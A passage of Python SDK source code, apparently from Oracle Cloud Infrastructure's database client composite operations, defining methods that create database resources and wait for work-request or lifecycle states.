operation_result = self.client.create_db_home(create_db_home_with_db_system_id_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_home(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_exadata_infrastructure_and_wait_for_work_request(self, create_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExadataInfrastructureDetails create_exadata_infrastructure_details: (required)
Request to create Exadata Cloud@Customer infrastructure.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_exadata_infrastructure(create_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_exadata_infrastructure_and_wait_for_state(self, create_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
to enter the given state(s).
:param oci.database.models.CreateExadataInfrastructureDetails create_exadata_infrastructure_details: (required)
Request to create Exadata Cloud@Customer infrastructure.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_exadata_infrastructure(create_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_backup_job_and_wait_for_work_request(self, create_external_backup_job_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_backup_job` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalBackupJobDetails create_external_backup_job_details: (required)
Request to create a cloud backup resource for a database running outside the cloud.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_backup_job`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_backup_job(create_external_backup_job_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_container_database_and_wait_for_work_request(self, create_external_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalContainerDatabaseDetails create_external_container_database_details: (required)
Request to create a new external container database resource.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_container_database(create_external_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_container_database_and_wait_for_state(self, create_external_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_container_database` and waits for the :py:class:`~oci.database.models.ExternalContainerDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateExternalContainerDatabaseDetails create_external_container_database_details: (required)
Request to create a new external container database resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_container_database(create_external_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_database_connector_and_wait_for_work_request(self, create_external_database_connector_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_database_connector` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalDatabaseConnectorDetails create_external_database_connector_details: (required)
Request to create a connector to an external database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_database_connector(create_external_database_connector_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_database_connector_and_wait_for_state(self, create_external_database_connector_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_database_connector` and waits for the :py:class:`~oci.database.models.ExternalDatabaseConnector` acted upon
to enter the given state(s).
:param oci.database.models.CreateExternalDatabaseConnectorDetails create_external_database_connector_details: (required)
Request to create a connector to an external database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalDatabaseConnector.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_database_connector(create_external_database_connector_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_database_connector(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_non_container_database_and_wait_for_work_request(self, create_external_non_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_non_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalNonContainerDatabaseDetails create_external_non_container_database_details: (required)
Request to create a new external non-container database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_non_container_database(create_external_non_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_non_container_database_and_wait_for_state(self, create_external_non_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_non_container_database` and waits for the :py:class:`~oci.database.models.ExternalNonContainerDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateExternalNonContainerDatabaseDetails create_external_non_container_database_details: (required)
Request to create a new external non-container database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalNonContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_non_container_database(create_external_non_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_non_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_pluggable_database_and_wait_for_work_request(self, create_external_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalPluggableDatabaseDetails create_external_pluggable_database_details: (required)
Request to create a new external pluggable database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_pluggable_database(create_external_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_pluggable_database_and_wait_for_state(self, create_external_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database` and waits for the :py:class:`~oci.database.models.ExternalPluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateExternalPluggableDatabaseDetails create_external_pluggable_database_details: (required)
Request to create a new external pluggable database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalPluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_pluggable_database(create_external_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_key_store_and_wait_for_state(self, create_key_store_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_key_store` and waits for the :py:class:`~oci.database.models.KeyStore` acted upon
to enter the given state(s).
:param oci.database.models.CreateKeyStoreDetails create_key_store_details: (required)
Request to create a new key store.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.KeyStore.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_key_store`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_key_store(create_key_store_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_key_store(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_pluggable_database_and_wait_for_work_request(self, create_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreatePluggableDatabaseDetails create_pluggable_database_details: (required)
Request to create pluggable database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_pluggable_database(create_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_pluggable_database_and_wait_for_state(self, create_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreatePluggableDatabaseDetails create_pluggable_database_details: (required)
Request to create pluggable database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_pluggable_database(create_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_and_wait_for_work_request(self, create_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateVmClusterDetails create_vm_cluster_details: (required)
Request to create a VM cluster. Applies to Exadata Cloud@Customer instances only.
See :func:`create_cloud_vm_cluster_details` for details on creating a cloud VM cluster in an Exadata Cloud Service instance.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster(create_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_and_wait_for_state(self, create_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
to enter the given state(s).
:param oci.database.models.CreateVmClusterDetails create_vm_cluster_details: (required)
Request to create a VM cluster. Applies to Exadata Cloud@Customer instances only.
See :func:`create_cloud_vm_cluster_details` for details on creating a cloud VM cluster in an Exadata Cloud Service instance.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster(create_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.VmClusterNetworkDetails vm_cluster_network_details: (required)
Request to create the Cloud@Customer VM cluster network.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_network_and_wait_for_state(self, exadata_infrastructure_id, vm_cluster_network_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network` and waits for the :py:class:`~oci.database.models.VmClusterNetwork` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.VmClusterNetworkDetails vm_cluster_network_details: (required)
Request to create the Cloud@Customer VM cluster network.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmClusterNetwork.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster_network(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def db_node_action_and_wait_for_work_request(self, db_node_id, action, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.db_node_action` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_node_id: (required)
The database node `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str action: (required)
The action to perform on the DB Node.
Allowed values are: "STOP", "START", "SOFTRESET", "RESET"
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.db_node_action`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.db_node_action(db_node_id, action, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
